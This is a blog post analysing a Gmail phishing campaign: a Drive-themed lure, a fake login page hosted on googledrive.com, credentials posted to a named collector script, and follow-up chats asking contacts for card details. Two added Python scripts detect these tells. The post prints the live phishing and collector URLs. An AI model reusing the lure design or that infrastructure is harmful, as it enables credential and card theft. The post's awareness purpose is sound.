Social engineering for stealing money

Aman Gautam
4 min read · Jul 10, 2016


I am not writing this to promote black-hat hacking, but to make people aware of the simple things they should keep in mind before entering any credentials or sharing confidential information on the internet.

Introduction

So, someone tried to hack me today. This was by far the best attempt at stealing my credit card information yet. I'll be honest, for a second I was about to give away my details. This article kind of reverse engineers the whole process.

I am assuming the hacker to be a 17-year-old male computer genius, working in a dark room, mess all around, staring at the black console window while sipping his coffee… Like in movies. Except, this guy is real.

Step 1: Hacking the Gmail Passwords

We don't need data to know that a LOT of people use Gmail for pretty much all their email requirements. So it makes a lot of sense to somehow get Gmail passwords, and the attacker chose to create a phishing page to do it.

To make it work, he sent a socially engineered message that went viral.

The cold email sent to the victims

Some of the clever things about this email include its neutral language (1). A lot of people, if not all, would open this link if it came from a friend. To make the whole "getting hacked" experience feel natural, the hacker used Google Drive. Something we all know about…

Best thing about this mail was that it was sent right from the inbox of my friend (who got hacked).

Use of bcc (see 2nd point above) was alarming enough for me…
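The two signals discussed above, the recipient being hidden in bcc and a link that does not go where it says, can be checked mechanically. The following is an added example and not code from the original post: a small Python triage script that parses a raw message, reports when your address is missing from To/Cc, and reports any link whose visible text is a URL on a different host than the real target. The second check goes beyond the post's own case (where the link really did go to googledrive.com); the message, addresses and hosts below are constructed for the example.

```python
"""Triage a suspicious 'shared document' email of the kind described above.

Added example, not code from the original post. Two checks: the recipient
is not listed in To/Cc (i.e. was bcc'd, the signal the post describes), and
any link whose visible text is a URL on a different host than the real
target. The message and addresses below are constructed for this example.
"""
import email
import re
from email import policy
from email.utils import getaddresses
from urllib.parse import urlparse

# Constructed sample: a compromised contact's account mass-mails a link to a
# page that imitates Google Drive. Hosts are placeholders, not real sites.
SAMPLE_MAIL = """\
From: Friend <friend@example.com>
To: someone-else@example.com
Subject: Document shared with you
Content-Type: text/html; charset=utf-8

<html><body>
<p>Hi, please have a look at the document I shared with you.</p>
<p><a href="http://drive.example/host/PLACEHOLDER_ID">https://drive.google.com/open?id=PLACEHOLDER_ID</a></p>
</body></html>
"""

LINK_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def listed_recipients(msg):
    """Lower-cased addresses that appear in the To and Cc headers."""
    headers = [str(h) for h in msg.get_all("to", []) + msg.get_all("cc", [])]
    return {addr.lower() for _, addr in getaddresses(headers) if addr}


def mismatched_links(html):
    """(visible_text, href) pairs whose displayed URL host differs from the real target's host."""
    found = []
    for href, text in LINK_RE.findall(html):
        text = re.sub(r"<[^>]+>", "", text).strip()  # drop any inline markup inside the anchor
        if text.lower().startswith(("http://", "https://")):
            if urlparse(text).hostname != urlparse(href).hostname:
                found.append((text, href))
    return found


def triage(raw_message, my_address):
    """Return a list of human-readable indicators for a raw RFC 822 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    indicators = []
    if my_address.lower() not in listed_recipients(msg):
        indicators.append("recipient hidden: your address is not in To/Cc (mass bcc)")
    for text, href in mismatched_links(html):
        indicators.append(f"link text {text} actually points to {href}")
    return indicators


if __name__ == "__main__":
    for line in triage(SAMPLE_MAIL, "me@example.com"):
        print("-", line)
```

Neither indicator proves phishing on its own (legitimate bulk mail is bcc'd all the time), but a message from a personal contact that trips both is worth a phone call before any link is opened.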

Step 2: Google Drive? Let's take you to Google Drive

Clicking on 3 in the above screenshot will take you to this link which looks something like:

http://googledrive.com/host/0B52qLeM0MApRa0lCQ2ltSFBVRE0 (DON’T ENTER YOUR DETAILS AFTER CLICKING)

So, what makes it harder to spot that it's a phishing attack is that it's hosted on GoogleDrive.com. This is smart!

A lot of people check the URL to figure out whether they are under a phishing attack.

So, the person who clicks for a Google Doc is actually taken to a Google Drive page asking them to log in to continue.

If you open suspicious links in Incognito Mode, like me, you get more hints, as it will ask you to log in before getting to this page. This is probably a mistake. This page should have been public, like every other login page. The hacker lost me at this stage.

Another mistake on this phishing page is not changing the page title (see point 1 in the above image). The page says “Google Drive. One Storage” and the title says “GoogleMail Storage”. Hacker probably won’t get through his interview at Google.

Step 3: It’s alright, nothing happened

Now some of us still don't realise that they are under attack. In this case, the hacker used the phishing page to POST data to the following URL:

http://aggelea.gr/wp-content/plugins/xyz.php

I am hoping to get access to xyz.php to find out more about what is happening on the server side. From the black-box perspective, it's saving whatever data is being poured into it and redirecting the user to an actual Google Doc.

Over the last couple of hours, I can see a lot of people coming to the Google Doc page. I really hope they are not victims of the attack.
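Both tells from Steps 2 and 3 (a title that does not match the page, and a login form that posts credentials to a completely different host) can be checked on the page's HTML before anything is typed into it. The following is an added example, not code from the original post or from anyone involved: a Python audit that parses a login page, flags any form with a password field whose action resolves to a host other than the page's own, and flags a `<title>` that does not match the visible heading. The sample HTML is constructed (it reuses the title and heading strings the post quotes), the page id is a placeholder, and the collector host is a placeholder rather than the real one.

```python
"""Audit a login page's HTML for the two tells described in Steps 2 and 3.

Added example, not code from the original post. It flags (1) any form with a
password field whose action posts to a host other than the page's own, and
(2) a <title> that does not match the visible heading. The HTML below is
constructed; the page id and the collector host are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample modelled on the page the post describes. The page URL uses
# the googledrive.com/host path the post mentions with a placeholder id; the
# form target host is a placeholder, not the real one.
PAGE_URL = "http://googledrive.com/host/PLACEHOLDER_ID"
SAMPLE_HTML = """\
<html><head><title>GoogleMail Storage</title></head>
<body>
<h1>Google Drive. One Storage</h1>
<form method="post" action="http://collector.example/wp-content/plugins/xyz.php">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""


class LoginPageParser(HTMLParser):
    """Collect the title, visible headings, and each form's action plus whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.headings = []
        self.forms = []
        self._capture = None  # which text element we are currently inside

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._capture = "title"
        elif tag in ("h1", "h2"):
            self._capture = "heading"
            self.headings.append("")
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "", "has_password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["has_password"] = True

    def handle_endtag(self, tag):
        if tag in ("title", "h1", "h2"):
            self._capture = None

    def handle_data(self, data):
        if self._capture == "title":
            self.title += data
        elif self._capture == "heading" and self.headings:
            self.headings[-1] += data


def audit_login_page(page_url, html):
    """Return a list of indicators; an empty list means neither tell was found."""
    parser = LoginPageParser()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    indicators = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A relative action resolves to the page's own host and is not flagged.
        target = urljoin(page_url, form["action"])
        if urlparse(target).hostname != page_host:
            indicators.append(f"password form posts off-site to {target}")
    title = " ".join(parser.title.split()).lower()
    heading = " ".join(" ".join(parser.headings).split()).lower()
    if title and heading and title not in heading and heading not in title:
        indicators.append(f"title {title!r} does not match visible heading {heading!r}")
    return indicators


if __name__ == "__main__":
    for line in audit_login_page(PAGE_URL, SAMPLE_HTML):
        print("-", line)
```

The off-site form action is the stronger of the two signals: a real sign-in page posts credentials back to its own origin, whereas a credential-harvesting page almost always has to ship them somewhere the attacker controls. The title check is only a sanity check for sloppy copies like the one in the post.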

Step 4: Let's make it viral

So the hacker has access to your login credentials now. It's easy to log in and send the same mail to all your contacts and hope to get a few more victims.

PS: I still don't know if this hacker used scripts to send the same email to all contacts or did it manually. I am talking to a few victims and will hopefully figure this out.

Step 5: Get some credit card numbers

So, the hacker logged into victims' accounts and sent messages to their contacts. Some of the messages exchanged between us:

These are the messages exchanged between me and my friend. We have been friends for the last 18+ years, and we normally talk in our local language. So the formal language used by the hacker saved me from sharing my credit card details.

A lesson learnt: always start a video call before sharing credit card details. You never know who might be behind that chat window.

Conclusion

Although it may look like a get-rich-quick scheme, it is nearly impossible to stay anonymous during this process. Eventually you'll be caught, and lose the money quicker. Not to mention, you may have to spend several years in jail that you could otherwise spend earning money as a free man.

This article is mostly a work in progress. I will share more details on the attack as and when I get them.
